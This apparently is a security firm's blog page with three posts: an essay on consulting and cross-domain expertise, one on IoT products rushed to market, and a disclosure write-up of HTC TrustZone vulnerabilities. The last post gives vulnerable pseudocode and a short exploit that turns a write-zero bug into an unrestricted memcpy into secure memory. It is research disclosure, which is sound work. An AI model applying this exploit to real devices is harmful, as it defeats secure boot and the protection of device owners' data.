Thursday, October 9

What I talk about when I talk about Consulting

Note: this post has very little to do with Atredis as company. The only relevance being a part of a consultancy has on this tirade is that its existence has positioned me to be invited back to BlueHat for a second year in a row to talk about whatever seems interesting to me at the time. 

This post is a textual version of my talk at Microsoft HQ and honestly more of a manifesto. It intends to define another way to explore your company, another way to look at technological expertise and another path to approach security as a fluid entity, or at the very least, track down Godot.

So, years ago I used to work at the Mitre Corporation. For the uninitiated to the realm, Mitre is a Federally-funded Research and Development Center and can be thought of as a pseudo-government think tank for pseudo-applied research constrained to non-profit status. I entered that organization with a solid career background as a developer specializing in crypto implementations, artificial intelligence and applied game theory. I was quickly tasked, at least in the Mitre sense of the word, with "do something cool and expand yourself". In a decidedly rash "because why the hell not" moment, I picked mobile security and human interactions as my paths of exploration. While I'm sure we will meander into security before the end of this diatribe, I'd oddly enough like to start with problems from the other space.

Specifically at Mitre, I looked at how to foster cross-domain innovation. I basically spent a couple years looking at how new ideas blossom when domain experts from disparate verticals interact and share conceptual structures. I spent weeks modeling building layouts and walking paths trying to ascertain how knowledge spread across the campus. I mapped social networks and interaction structures, I explored forced office mate collaborations and I basically geeked hard on graph theory. I wanted to know how small situational changes could force "Dr. Satellite WaveForm Guru" to stop and share a cup of coffee with "Intern Physicist" and for some reason I always expected robots to fall out of the conversation. Awesome laser wielding autonomous robots that would simply self design more robots and blow things up with lasers while rad 80’s metal blared in the background. I guess I had a thing for robots.

I also wanted data, mounds and mounds of data, to fit into beautiful Gephi graphs that could be analyzed and improved upon. I wanted innovation efficiency. Maybe I thought that the end game was me sitting back in some darkened hivemind control room, watching structured magic happen in realtime, I really don't recall. 

I thought that if we could simply control the environment with enough scientific accuracy, we could control that initial "spark" that so many startup books lauded as the beginning of massive scientific breakthroughs. Stated simply, I wanted to play God to a campus of Mensa-level experts. What a surprise it didn't work right? Solving the social graph is a slightly harder problem than raw data collection, who knew?  

I did walk away with some insight, that while obvious to most people, had eluded me in the depths of my contrivances. A happenstance chat between two people is almost never really an accident, and it takes a catalyst stronger than a once in an occasional espresso to bond two elements from opposing sides of the periodic table. 

In my case, the best catalyst was a bonding agent delivered in the form of an inquisitive procrastinator. An outgoing person who would shirk their own responsibilities and deadlines to randomly walk around and ask people "what are you working on". None of the managers could facilitate these meaningful interactions because they had little insight into what other teams were doing outside of their own silos, and were too damn busy “Getting Things Done”. 

A lowly slacker barely hanging onto gainful employment, though, could cross-pollinate like mad. Randomly walking around the building and asking people "whats up, what are you working on?” and then accidentally sharing others problems during small talk. Someone doing that was pure innovation gold. That person was also a huge burden to the immediate bottom line of the company and easily dismissed as a dead end to a small organization. An unrecognized hero that all too often is left with a pink slip and some much needed "forced vacation". [Shawn says: see also Maclolm Gladwell's "The Tipping Point", on influencers and hubs.]

Let's pause that line of thought for a second and chat about why I sometimes look at Katie Moussouris as the Paul Erdös of Microsoft. If you don't catch it, we will un-pause this conversation when I start talking about degenerates with spray paint.
Mathematician Paul Erdös. Knuth is his homeboy.
Paul Erdös was a brilliant mathematician who solved no small amount of insanely difficult problems, but that's not what he is really known for. He crossed into the general public consciousness for his prolific collaboration across fields, he is more than 15-minute Andy Warhol Famous for the Erdös Number. The Kevin Bacon of Academia in a sense. 

There are books and websites on this construct, so I'll let the one person reading this unfamiliar with the topic explore at their own pace because I don't care about the number either. I want to point out something less evident. 

To some extent, Erdös created a bug bounty in academia. The impetus was vastly different, obviously. I can't speak for Katie or MS, but I don't think either of them wanted to offload problems that would be open and unsolved post personal demise for the simplistic sake of leaving nothing unknown and unexplained. I've never found a definitive source for his original construct, and have always assumed it was an amphetamine-fueled decision process wherein he thought "If I could only be more people, I could solve more problems". A "Fear and Loathing in Las Academia" path to cloning I guess. 

Erdös attacked the problem by offering small rewards to those that solved open problems he didn't have time or the mental faculty to tackle himself. He simply outsourced problem solving before there was a term for it. If inquiring minds want to know more, read "Erdös on Graphs" or anything about Fermat's last theorem both will expound upon the program. The problems were (and the open ones still are) immensely hard.

Take a look at the Collatz Conjecture, for example:
Take any natural number n. If n is even, divide it by 2 to get n/2, if n is odd multiply it by 3 and add 1 to obtain 3n+1. Repeat the process indefinitely. The conjecture is that no matter what number you start with, you will always eventually reach 1.
Paul Erdős said about the Collatz conjecture: "Mathematics is not yet ready for such problems." He offered $500 USD for its solution
Simple, huh? As someone who has wasted a considerable amount of time contemplating this one, I welcome you to join the dark side. It is hard and you have loved ones and friends that need you more, but the outcome would be so fascinating, I really don’t mind you not having nights or weekends 

An Erdös check isn't even the type of check you cash, actually. You frame that check and hang it on your office wall when Harvard offers you tenure for being an epic badass. Your prize is writing a page in the book of human knowledge. I might have a slight hero complex here.

Taking a step back though, all Erdös did was to entice random people from random spaces to attack a generic problem. This construct enabled unique points of view to descend upon the same problem space and interact. He seeded the coffee shop with talking points and smart people. He asked a couple of questions and in a sense played God with the outcome. 

History and time actually solve the problems, building upon breakthrough after breakthrough. Fermat's Last Theorem itself was solved with a mix of pure innovation and branches of mathematics that are now foundational but were revolutionary or simply non-existent when Fermat trolled the world and much later when Erdos offered up a reward for the joke.
Pierre de Fermat, Legendary Troll
Treating exploration as foundational knowledge can be seen in most everywhere if you look, but nothing springs to my mind as a better exemplar than graffiti and street art. It is a scene, a lifestyle, legally dubious and in our conversation, a collection of raw transitory data cataloging human interaction. It all starts with an empty wall and one after another people come along and tag it, expand upon it, connect the disparate parts and create a living entity of artistic expression. I guess it would be akin to free form jazz collaboration, but in this instance a city worker washes it away on a scheduled basis and the entire process cycles anew.
London Graffiti
Eyesore or museum quality, in this context we don't care about the transitory expression itself. We care about the process and the components that play the game. Every actor has a part in the whole and each person comes into the collaboration with a specific intent and a specific skill set. Every interaction becomes essential to the overall evolution of the art that exists and each artists specialty is a core component of the overall construct.

Let me say the same sentence again with slightly different actors: 

Every interaction becomes essential to the overall evolution of the product that ships and each team specialty is a core feature of the overall ecosystem.

If you just woke up from a nice nap with a nightmare about team meetings, I’m sorry and I’ll pause the metaphor break for a bit longer. Consider it a snooze button on the alarm clock of Windows Phone Bluetooth explorations because I want to talk about expertise first.

If I say Kasparov, you probably think about knights and blue mainframes, but let’s drop the mind games and focus on chess for a second. True and utter mastery from our perspective. Not infallible, but an expert by every definition I am aware of. It would be ludicrous to expect anyone in this room to beat a grand master at his or her own game (it could happen, but your ego aside please let me have this statement as fact). Best of 3, 7, 101. As long as we are in the game of chess Kasparov wins. But what if we switch to checkers? Theoretically your odds are better I guess given it is a divergent game, but the outcome is predictable. 

What if we extrapolate this out to “all games” though? I’m going to go out on a limb and bet that at least one person reading this could beat Kasparov at Quidditch and probably half of us would win at Texas Hold ‘Em.
Gary Kasparov, sub-par Quidditch and Poker player
Expertise mixed with human nature tends to silo itself, specific and targeted perfection normally does not mix with well rounded knowledge. It’s the reason people group themselves by similar interest and it is the reason why my two scientists never made laser wielding robots at Starbucks. 

But what if we replace Kasparov with von Neumann, a generally accepted “smart guy” and game theorist at heart. His perfection was not a single game, but the entire construct of a game. Dr. John would not have the skill depth to win against a master, but would understand the implications and theoretical correctness of every move, in every game. Except maybe Quidditch, but probably even that scenario he would see things subtly missed by the lay player. Master in none but “expert” in all? Not really, probably more appropriate to say master in none but meta-understanding in all. He couldn’t beat Kasparov, but he could enumerate where he and Kasparov made mistakes. In a way, he would be qualified to help train and guide a master.
John von Neumann, would build Quidditch state machine
This was a very long winded way of getting to my point. I want this for you. You are the Kasparov and the Scientist. You have teams that are immensely smart in specific domains and sub-domains and sub-sub-domains, you probably even have a couple slackers helping ideas spread (please don’t fire them, they are your revenue stream in 10 years). What I’m arguing for is a game theory bonding agent, one that can look across silo interactions internal to your products and across all of your competitors.

I want this for you because the real secret is. They are not your competitors. You don’t compete, you innovate and build technology. Other companies do that as well and you share market space with them. Sure, quarterly profit margins make it feel like a race but the longer term reality is that you are responsible for making things better. That is your real place in the game, you construct the future. If you were simply competing, all your advertisements would look like political ads and read “We don’t suck as much as $Product_X”.

From a security perspective, internal teams can tell you exactly what is exposed within the confines of their expertise. If those teams are looking at public security theater they can ensure you are not exposing anything documented with a CVE or any vulnerabilities frozen in YouTube presentations. This should be your base minimal expectation.

One last divergence before my parting thoughts:

Please, please, please don’t ever expect your people to “think outside of the box”.  You want experts and that saying is simply “marketechture” and “thinkfluence" bullshit. No one thinks well “outside of the box” because no one is an expert at something they are not an expert at. 

All you get with that request is someone fumbling around and maybe getting lucky. Instead, bring an outsider into the process and expect to get another set of eyes on your problem from someone with a completely different view of the world. Someone with a (potentially lesser) expertise in a (potentially) much larger problem space. An outsider brings new context to the thinking process, “thinking outside of the box” kills morale and wastes smart people on silly things.

Final tirade aside, if you want to know how your different silos interact within a product, you need someone who understands how that technology works. Generally, you want someone who understands all the technology at a less expert / more meta-theory level. Let that person force both expert teams into understanding consequences outside of their vertical.

If you want to know how your technology implementation compares to other companies selling products, look for someone who has an interest in the overall technology space and don’t try to force them into expertise. In AI I used to search for sub-optimal paths: problems with multiple answers wherein the selected solution was the closest to optimization within the computing constraints. Look for sub-optimal expertise, sometimes you don’t need a PhD for progress. You just need a really excited intern. (Unless it's one of those times you need a PhD).

Do you honestly want to know how your product is going to fare in the post ship-date real world? You need to understand every problem in your technology space, all of the problems in your vendors technology spaces and all of the potential problems from technology that might have conceptually portable attack scenarios. 

Trying to secure Bluetooth? I’m sure you have hardened the driver against your hardware, but have you looked at porting all known RFID attacks to your implementation? Do you know what services other vendors expose at the unpaired level of discovery? Have you explored how IoT or RTOS based kernel attacks could be conceptually leveraged against your driver code? If you ever bring in consultants or employees to answer these overall questions and have the realistic intent to use them for anything more than staff augmentation, you should ensure they will do this. You should ensure it excites them and that they want to do it.

Ok, so you really want to know how to leverage the process used by a good consultant?

Stop trying to make everyone an expert at a thing and start trying to make technology better. Period.

We don’t look at other companies as your competitors, we look at the meta case of “how do we make technology more secure by having fun and breaking things we admire”. You can do the same thing, or you can outsource that to the sub-optimal-experts 

We tend to continually learn a technology by looking at all implementations of it. We tend to start with cross domain similarities and extrapolate from there. We look for the general delta between our knowledge base and your product, and we try to minimize that delta.

Thanks,

m0nk

(and I promised I would mention Godot in this diatribe, so… Godot)


Wednesday, October 8

Let's stop innovating failure

So today I’d like to posit some overall thoughts on the “Internet of Things”, specifically pointed at the innovation space and getting products to market. This is quite outside of my company’s normal wheelhouse, but I think our hands on perspective of what hits the streets (and our desks) will be unique enough to pique interest from a broader audience. For those in the security space, I guess I should apologize for the lack of direct exploitation techniques, but this diatribe is really meant for the broader group outside of our walls.

So, you (or your company) have a great idea to change the world and make a huge profit. First of all, congrats and good luck. All you have left to do is write some code, design some hardware and package it all together into an amazing widget. The only problem you face is a temporal one… if you thought of something, chances are others are also thinking about your problem, and hence the race to market begins. 

Speaking of your market, my view is that it functions in 1 of 3 distinct ways:
  • You find yourself entering the market as a sole innovating product with no direct competitors
  • You have a unique and special flair for your product, but you are not alone in the space.
  • You are a big name vendor that is entering the space. 

Realistically, the “big name vendor” should not be a separate bullet. Your specific product falls into either of the “novel” or “iterative” spaces listed, but your name and power come with some additional considerations. The new device you are shipping will benefit from your company name and the reputation you have with customers, but if the product fails you will see negative impacts outside of your space. Simply, if your newly enhanced smart TV ships with copious numbers of security flaws, that branding might negatively impact other business units.

For the “iterative” space, you will benefit from the general advertising across your competitive landscape. This effect should be considered cumulative, if not exponential, as the barrage of adverts self validates the product as needed and required from the consumer view. Given you don’t have to sell the overall vision, your advertising tends to focus not on the overall technology but on your special sauce.

For the “novel & new” product designs, you are laden with selling the concept that the market has a hole and consumers simply can’t live in a world with such a void. As your product is alone in it’s space, it sells itself once the consumer is convinced of the overall void.

Now, I mention the advertising space because I believe it embodies a considerable amount of how you as an innovator personally see your product. It is a faint echo of what your priorities are and a telling exhibit of how you are specifically positioned in the market. It also allows me (as a security researcher) to assume what level of security to expect in the product. I do this by extrapolating your security design as a function of “assumed priorities” and “time from design to market”, generally the faster you race the weaker I expect your implementations are. It is logical (although a bit cheating), but the metric seems valid from analysis to date.

In general, no company is going to reinvent the wheel. There is no need, it costs too much and is generally a bad idea (hopefully gone are the days of rolling your own crypto). Instead, I predict your product will be based on a fairly standard design:
  • You have some embedded processor running Linux (or if you hate me personally, Windows)
    • If you are constrained or concerned about speed / size / power, you drop linux and ship with an RTOS or code on bare metal instead
  • Following good software engineering principles, your code is modular and uses large swaths of code not written specifically for this project (libc, WiFi and IP stacks, display drivers, etc.)
  • You build your product around a known processor and follow design guidelines from the manufacturer, possibly even basing your design on a template provided by the vendor
  • Knowing mistakes happen, you ship your device with debugging capabilities enabled or easily re-enabled… this helps with RMA problems and figuring out how fielded devices fail

This in essence is efficient design, you offload as much engineering as you can on previously proven and fielded devices and leave only the hard and specific problems to yourself. You cut costs and gain a robust support architecture. Aside from the last bullet, this mentality it is a sound. But in reality nothing is free, and these choices have the following consequence:

As a researcher, I am already familiar with your product before you ship it
  • I know the system on chip reference designs and suggested hardware designs
  • I know the operating system particulars
  • I know how to debug your product
  • I am aware of the known issues in your building blocks

In general, this is why I see innovation “Time to Market” as a realistic metric for “Time to Failure”. Your wonderful engineering practices and time saving approaches leave your product prone to exploitation. In a grim reality, your largest saving grace when racing to push things to market is the actual market saturation itself; the case is not “is your device insecure” as much as “has anyone spent the time to look at it instead of a competitor or another device”. I honestly don’t mean to be dismissive here, I respect the hard engineering problems you have overcome. I’m simply stating that I find it rare that a “novel new product” is actually new or unknown to us in the security industry. To borrow from the above example, your new smart TV is identical to the embedded industrial control system I looked at last week.

I promise we are almost past the dour news, but simply stated the following assumptions appear to drive your "idea to design to development to shipping" cycle:
  • Assumption #1: Your special sauce is cutting / bleeding edge and highly innovative. You race these concepts to market before they are secure expecting protection from your building blocks. This is highly understandable from a market perspective, though maybe not the best idea.
  • Assumption #2: You assume your selected platforms and building blocks are secure because they are fielded by others. This is sadly incorrect in a general sense. The vendors in that space are following assumption #1 and you are simply the powerless consumer.
We all want to stand on the shoulders of those that came before us, but we need to take the time to understand the limitations of those principles.

Your product will never be 100% secure, nothing is. That is no excuse to not understand your actual security posture and the inherited posture of your base platforms. It is honestly a hard problem, so I will suggest a mindset that might help:

Aim for is a level of security based on the ROI of what you are protecting. 

Understand the financial impetus of your market and your potential attackers. Respect your consumer and their needs as much as you respect your own device. This is a simple idea that should be obvious, but I see it disregarded too often to not specifically mention.

It is not that linux and your other “off the shelf” building blocks cannot be configured to be secure enough for your use case, the real problem is that in your rush to market you assume they already are and nothing could be further from ground truth.

What you can do:
  • Stop assuming security is someone else’s problem
  • Start considering what potential your product has to be misused
  • Don’t just test your product with a “happy test path” mentality
  • Actively ask your engineers to break your design BEFORE you commit a single line of code or anything to silicon and don't write code until they fail at this task
  • Continue this process until you ship your device
  • Continue this process as you iterate designs on a shipped product
  • Ask for help
  • Consider what side effect implications your product has to your customer environments

I don’t mean to shill our services here, but seriously you should ask for external eyes on your design and your product from someone qualified to help. Don’t think that just because we are security consultants or hackers that we are the enemy. Semantics aside, we are honestly here to help. Hire someone to tell you your weak points and take heed to the reports. Consider it an integral part of your marketing budget; I promise it will be considerably cheaper that trying to play publicity cleanup once issues are out in the open. 

If you want a product with longevity and a customer base that will continue to buy into your brand and vision, you need to respect them. Take care of them, protect them and don't assume someone else will. The security of your customer is just as much your responsibility as delivering a new device to them is. The decision may delay your time to market by a week or a month, but the end result will be a better product and a better world. 

Thursday, August 14

Here Be Dragons: Vulnerabilities in TrustZone

In June we presented on vulnerabilities in the Qualcomm & HTC implementations of TrustZone at REcon 2014. We have been patiently waiting to drop the research to those interested, and now that Vegas is behind us, we can finally do so.

Why the wait? Well, after REcon, we noted that Dan Rosenberg was presenting on TrustZone research at Black Hat USA, and out of respect for Dan's work, Atredis decided to sit on this blogpost until after his talk. Overlaps and similar research happen all the time, and since BlackHat was fairly close at the time we thought it best to let Dan have the mic. Dan's stuff is great - you should check out his slides and WP; he dropped a good bug with similar impact, and it covers some TZ components not discussed here.

[What is TrustZone?]


The ARM specification of TrustZone Technology has been heavily promoted as the "be all, end all" solution for mobile security. Through extensive marketing promises of easy BYOD, secure pin entry, and protection against APT (not to mention the ubiquity of ARM chips soldered into mobile devices) TrustZone has become the de-facto standard for claiming and providing a "secure processing environment" in cellular handsets.

While a secure processing environment sounds like an awesome thing to have as an end user, the realistic drivers for the massive TrustZone adoption are not owner empowerment but the more mundane use-case of Digital Rights Management (DRM). The secure enclave of TrustZone is primarily used to facilitate vendor locks and DRM processing, rather than increasing the difficulty in compromising user data. Further, due to TZ architecture, the inclusion of DRM protections provide a net reduction in real world security provided to the device owner.
h/t http://www.clker.com/clipart-10389.html

Soap box and ramblings aside, Google is your friend if you want more specification data from ARM or if you want high level details from Qualcomm's fortress of shallow marketing materials (trademark pending)... but enough already, let's talk details.

You can watch our REcon presentation here, but unfortunately the first 10-15 minutes was cut off. We're using this blog post to document the vulnerabilities reported to HTC and shed some further light on TrustZone.

[Funny aside: after finding HTC's PGP key on their site and emailing them, they got back to us a month later saying they couldn't open it, and to please send in the clear. We obliged, and they've told us it's fixed, but we are unable to validate until a new firmware revision makes it through a carrier and into the real world.]

[Interfaces]

TZ consumes untrusted input from a number of places:
  • SMC [Secure Monitor Call] interface (has had the most public research)
  • Interrupts
  • Shared Memory
  • Peripherals
We primarily focused on the SMC interface for this round of TZ research. Additionally, we built a fuzzer for TZ that resulted in a metric ton of crashes, but because of architectural reasons, we still think the best route for TZ vuln discovery (on the SMC interface) is via static reversing.

[SMC]

The SMC interface is invoked by utilizing the SMC ARM instruction from supervisor mode, meaning you need to be in the kernel. You invoke the instruction with a pointer to a physical memory location that contain the below structures. Code snippits below are taken from arch/arm/mach-msm/scm.c from an Android kernel.
 42  * An SCM command is laid out in memory as follows:
 43  *
 44  *      ------------------- <--- struct scm_command
 45  *      | command header  |
 46  *      ------------------- 
 47  *      | command buffer  |
 48  *      ------------------- <--- struct scm_response
 49  *      | response header | 
 50  *      -------------------
 51  *      | response buffer |
 52  *      -------------------

The scm_command struct contains its total length, offset to its request buffer, offset to its response buffer header (which in turn contains another offset to its own buffer), and the buffers themselves:
 58 struct scm_command {
 59         u32     len;
 60         u32     buf_offset;
 61         u32     resp_hdr_offset;
 62         u32     id;
 63         u32     buf[0];
 64 };

The resp_hdr_offset entry points to:
 72 struct scm_response {
 73         u32     len;
 74         u32     buf_offset;
 75         u32     is_complete;
 76 };

Lastly, the example kernel driver code that utilizes these buffers:
164 static u32 smc(u32 cmd_addr)
165 {
166         int context_id;
167         register u32 r0 asm("r0") = 1;
168         register u32 r1 asm("r1") = (u32)&context_id;
169         register u32 r2 asm("r2") = cmd_addr;
170         do {
171                 asm volatile(
172                         __asmeq("%0", "r0")
173                         __asmeq("%1", "r0")
174                         __asmeq("%2", "r1")
175                         __asmeq("%3", "r2")
176 #ifdef REQUIRES_SEC
177                         ".arch_extension sec\n"
178 #endif
179                         "smc    #0      @ switch to secure world\n"
180                         : "=r" (r0)
181                         : "r" (r0), "r" (r1), "r" (r2)
182                         : "r3");
183         } while (r0 == SCM_INTERRUPTED);
184 
185         return r0;
186 }

When smc is called, the command buffer will contain a struct made up the ID of the TZ service being called and an arbitrary number of variables needed for that function.

As one example, scm_set_boot_addr in scm-boot.c invokes SMC like so:
 22 int scm_set_boot_addr(phys_addr_t addr, unsigned int flags)
 23 {
 24         struct {
 25                 unsigned int flags;
 26                 unsigned long addr;
 27         } cmd;
 28 
 29         cmd.addr  = addr;
 30         cmd.flags = flags;
 31         return scm_call(SCM_SVC_BOOT, SCM_BOOT_ADDR,
 32                         &cmd, sizeof(cmd), NULL, 0);
 33 }

[Aside: SCM is not a typo. Qualcomm actually chose SCM, "Secure Channel Manager", as a wrapper for SMC. The scm_call function simply spins up the correct kernel buffers and converts virtual addresses to their phys counterparts.]

OK, so we know how SMC works, what can we actually talk to?

[TrustZone Services] 

Inside TZ, there is a table labeling all the services, command IDs, location of the function implementing a given service, return types, and the number and size of arguments. It looks like this:
ROM:2A02E054                 DCD 0x801               ; Service ID
ROM:2A02E058                 DCD aTzbsp_pil_init     ; "tzbsp_pil_init_image_ns"
ROM:2A02E05C                 DCD 0x1D                ; Return type
ROM:2A02E060                 DCD tzbsp_pil_init_image_ns+1
ROM:2A02E064                 DCD 2                   ; Number of arguments
ROM:2A02E068                 DCD 4                   ; Size of arg1
ROM:2A02E06C                 DCD 4                   ; Size of arg2
ROM:2A02E070                 DCD 0x805
ROM:2A02E074                 DCD aTzbsp_pil_auth     ; "tzbsp_pil_auth_reset_ns"
ROM:2A02E078                 DCD 0x1D
ROM:2A02E07C                 DCD tzbsp_pil_auth_reset_ns+1
ROM:2A02E080                 DCD 1
ROM:2A02E084                 DCD 4
...

... And so on.

From here, we can enumerate all available services, know what to expect them to return, as well as know how many arguments to send and what size they are.

[Pointer: this table is really useful for figuring out the base of the firmware image when you extract it from a device or a firmware file. The string pointer for service 0x801 should always point to "tzbsp_pil_init_image_ns", giving you the offset values you need to calculate its base.]

Looking at the full listing, most are part of the Qualcomm core functionality available on all supported devices, but OEMs have the option of extending it with their own services. HTC extended theirs considerably, so let's focus on them:
tzbsp_oem_do_something
tzbsp_oem_enc
tzbsp_oem_get_rand
tzbsp_oem_log_operator
tzbsp_oem_hash
tzbsp_oem_set_simlock_retry
tzbsp_oem_get_security_level
tzbsp_oem_verify_bootloader
tzbsp_oem_aes
tzbsp_oem_set_simlock
tzbsp_oem_update_simlock
tzbsp_oem_simlock_magic
tzbsp_oem_read_mem
tzbsp_oem_set_ddr_mpu
tzbsp_oem_update_smem
tzbsp_oem_emmc_write_prot
tzbsp_oem_write_mem
tzbsp_oem_set_gpio_owner
tzbsp_oem_read_simlock
tzbsp_oem_access_item
tzbsp_oem_disable_svc
tzbsp_oem_read_simlock_mask
tzbsp_oem_memcpy
tzbsp_oem_3rd_party_syscall
tzbsp_oem_query_key
tzbsp_oem_simlock_unlock
tzbsp_oem_memprot
tzbsp_oem_key_ladder

Look at those primitives! _write_mem, _read_mem, _memcpy?!

Ah, so here's where we learn a new valuable lesson about TZ service security: Everyone does their own thing. To summarize it:
  • Each function individually validates input on invocation.
  • HTC utilizes an access bitmask representing each of their tzbsp_oem functions, with a check at the top of every function determining if the service is disabled or not. (See [is_service_enabled] below. This is how HTC disables those fantastical exploit primitives listed above.)
  • Qualcomm does not universally block access to any of their functions. If they're present, it's assumed they're needed, and while input is validated, the function itself is accessible to the kernel.
  • Qualcomm's input validation uses a check against several protected memory regions, bailing out if you touch any of them.
  • Some OEMs perform their own validation of input against their specific address ranges, rather than using QC's list. Their addresses are, umm, less complete.
  • Some platforms copy QC's model, performing the same validation. 
One thing I'll point out about this model is that each function has to do it correctly, themselves. Guess how consistent it is across all of the given players?

[Randomness: You may notice the tzbsp_oem_do_something function. We've seen that function in numerous vendor implementations, and we can only suspect it is sample code that QC provides to OEMs who just leave it in their production code. If you are curious what that function does, however, you will usually find it merely returns 0. Yes, the aptly named tzbsp_oem_do_something inevitably does nothing.]

[Enter HTC]

One short piece of information before we dive into the bugs.

[is_service_enabled]

This is the bitmask I was referencing above that HTC added to their OEM functions. The bitmask starts off as 0xFFFFFFFF in flash, and during boot, dangerous functions are turned off once they are not needed. This is perhaps a fragile model, but it does allow the temporary usage of TZ services that can later be disabled after they are no longer needed.
signed int __fastcall is_svc_enabled(unsigned __int8 svc_id)
{
  return g_disable_bitmask & (1 << svc_id);
}

[Note: TZ does quite a bit of validation, to varying degrees of success, on addresses passed in to ensure writes to secure memory don't occur. Because of this, if you pass in the address of a kernel variable to detect a write vulnerability, it won't tell you anything, because it is not a secure address. So how can you detect write vulnerabilities without reversing them? Well, you can pass in the address of g_disable_bitmask and then try to invoke all OEM functions as a poor man's read primitive. If your write succeeded, you will see that different functions are now enabled/disabled.]

[tzbsp_oem_access_item, address validation]

#define IS_TZ_MEMORY(x) (x >= 0x2A000000 && x < 0x2B000000)

int tzbsp_oem_access_item(int write_flag, int item_id, void * addr, int len) {
  if (!is_svc_enabled(26)) {
    return -4;
  }

  if (IS_TZ_MEMORY(addr) || IS_TZ_MEMORY(addr + len - 1) ) && addr < 0x2A03F000) {
    return -1;
  }

  if (!write_flag) {
    ...
    if (item_id == 37) {
      if (g_flag > 0) {
        memcpy(addr, g_item_37, len);
      }
    }
    ...
  }
}

HTC uses similar bounds checking in a few places. This check tries to verify if the start and stop addresses are in between 0x2A000000 and 0x2A03F000. There are multiple problems with this:
  • It's only checking against one range, where QC's code checks against 12.
  • What happens if the length value is really big? (Answer: it overflows and wraps around under 0x2A03F000, bypassing this check, but it's ugly and influences a lot more than is ideal.)
  • This address range is supposed to be the TZ code and data itself, but someone forgot to update the ceiling, because the TZ code extends past 0x2A03F000 due to large amounts of DRM code.
In any event, that one is a pain to exploit, and there are others, so let's move on.

[tzbsp_oem_discretix, memory write]

int __tzbsp_oem_discretix(struct_p * s, size_t len) {
  if (len != 0x14) {
    return -16;
  }
  s->status = g_fs_status; // *(int *)(s + 16) = g_fs_status
  ...
}

Hey, not everyone validates their input! And check that out, an overwrite of s->status (s + 16) with whatever is stored at 0x2A02BC80 (g_fs_status).

We later determined this value was zero in every case we cared about, so we can call it a write zero primitive. Under the hood, it is using the ARM STR instruction, so it has to be 4-byte aligned, but is otherwise very flexible.

[tzbsp_oem_memcpy, why do you exist?]

#define IS_TZ_MEMORY(x) (x >= 0x2A000000 && x < 0x2B000000)
#define CONTAINS_TZ_MEMORY(x, len) (x < 0x2A000000 && (x + len) >= 0x2B000000)

signed int tzbsp_oem_memcpy(void * dst, void * src, uint32_t len)
{
  uintptr_t dst_end   = dst + len - 1;
  uint32_t copying_to_tz   = CONTAINS_TZ_MEMORY(dst, len) || IS_TZ_MEMORY(dst);
  uint32_t copying_from_tz = CONTAINS_TZ_MEMORY(src, len) || IS_TZ_MEMORY(src);

  if ( !is_service_enabled(20) )
    return -4;
  
  if (copying_to_tz && copying_from_tz) {
    return -1;
  }
  if (copying_to_tz && dst < 0x2A03F000) {
    return -1;
  }

  if ( dword_2A02BAC8 > 1u ) {
    if (dst < 0x88AF0000 && dst_end >= 0x88AF1140) {
      return -16;
    }
    if ((dst_end + 0x77510000) < 0x1140 || (dst + 0x77510000) < 0x1140) {
      return -16;
    }
    if (src != 0x88AF0000) {
      return -2;
    }
    if (len != 0x1140) {
      return -17;
    }
  }
  memcpy(dst, src, len);
  invalidate_data_cache(dst, len);
  return 0;
}

In this pseudocode, we can see some address validation (heh, no comment), checking a flag to perform further validation, etc. At the very end, we have:

  memcpy(dst, src, len);
  invalidate_data_cache(dst, len);
  return 0;

So if we can get there, we have a fully controlled memcpy(). But how can we do that?

00 00                        MOV r0, r0         ; nop in thumb mode
00 00 00 00                  ANDEQ r0, r0, r0   ; nop in arm

A null write is a NOP equivalent in both ARM and thumb mode, if you overwrite code. And surely that isn't RWX, is it? Well, apparently so.

ROM:2A003278                 PUSH            {R3-R7,LR}
ROM:2A00327A                 MOV             R4, R0
ROM:2A00327C                 MOV             R3, R1
ROM:2A00327E                 MOV             R5, R2

// validation, nop'd out

ROM:2A0033EC                 MOV             R1, R3
ROM:2A0033EE                 MOV             R0, R4
ROM:2A0033F0                 BLX             memcpy
ROM:2A0033F4                 MOV             R1, R5
ROM:2A0033F6                 MOV             R0, R4
ROM:2A0033F8                 BLX             invalidate_data_cache
ROM:2A0033FC                 MOVS            R0, #0
ROM:2A0033FE                 POP             {R3-R7,PC}
ROM:2A0033FE ; End of function tzbsp_oem_memcpy

Using the write zero primitive on the address range from 0x2A003280 to 0x2A0033E8 nops out all validation, allowing you to memcpy in and out of secure memory as desired.

This memcpy can be used to export all data out of secure memory, copy in your own shellcode, overwrite QC's knowledge of where secure and insecure code resides, and anything else you need. Boom!

The exploit code is shown below, utilizing this memcpy to overwrite the g_disable_bits bitmask with 0xFFFFFFFF to turn on all services. For simplicity, the call_svc function is not included, but it is merely a wrapper around a smc call that sets up the scm_command structure. It takes in the SCM function identifier, the argument count, and then that number of arguments.

  #define TZ_MEMCPY_NOP_START (0x2A003280)
  #define TZ_MEMCPY_NOP_STOP  (0x2A0033E8)
  #define TZ_HTC_DISABLE_BITS (0x2A02BAC4)

  #define TZ_HTC_OEM_MEMCPY_ID (0x3f814)
  #define WRITE_ZERO(x) call_svc(0x3f81b, 3, 0x0, x - 0x10, 0x14);

  // allocate our version of the g_disable_bits and set to 0xffffffff (all enabled)
  int * val = kzalloc(4, GFP_KERNEL);
  val[0] = 0xffffffff;

  // NOP out all validation in tzbsp_oem_memcpy
  for (i = TZ_MEMCPY_NOP_START ; i <= TZ_MEMCPY_NOP_STOP ; i+=4) {
    if ((i % 4) != 0) {
      printk("[-] [0x%x] INVALID NOP...MUST BE 4 BYTE ALIGNED!\n", i);
      break;
    }
    WRITE_ZERO(i);
  }
  flush_cache_all();

  // use memcpy to enable all the other functions (unnecessary but fun)
  call_svc(TZ_HTC_OEM_MEMCPY_ID, 3, TZ_HTC_DISABLE_BITS, virt_to_phys(val), 4);

 

[So What?]

We've shown a pathway for gaining arbitrary code execution within TrustZone, but, in fairness to Qualcomm, this specific exploit is limited to HTC devices and caused by code HTC added. However, it's a great exemplar of how just one, terrible, and obvious write zero vulnerability can lead to the complete compromise of TrustZone. And due to TrustZone's architecture, passing physical buffers back and forth, this class of write vulnerability is the most common and simplest vulnerability you're going to find. So to summarize, write vulns pop up like mushrooms from this fertile ground, and write vulns can really ruin your day.

To put it another way, why does a mistake in discretix (dealing with DRM functionality) have the ability to nuke secure boot? This seems like a dangerous idea, and is what we meant when we started this all off with the claim that the inclusion of bad, complex code provides a net reduction in real world security for the user. And we're ragging on DRM code here because that's where the vulnerability we discussed was found, but TZ does not allow for the inclusion of imperfect code, anywhere. And imperfect code abounds.

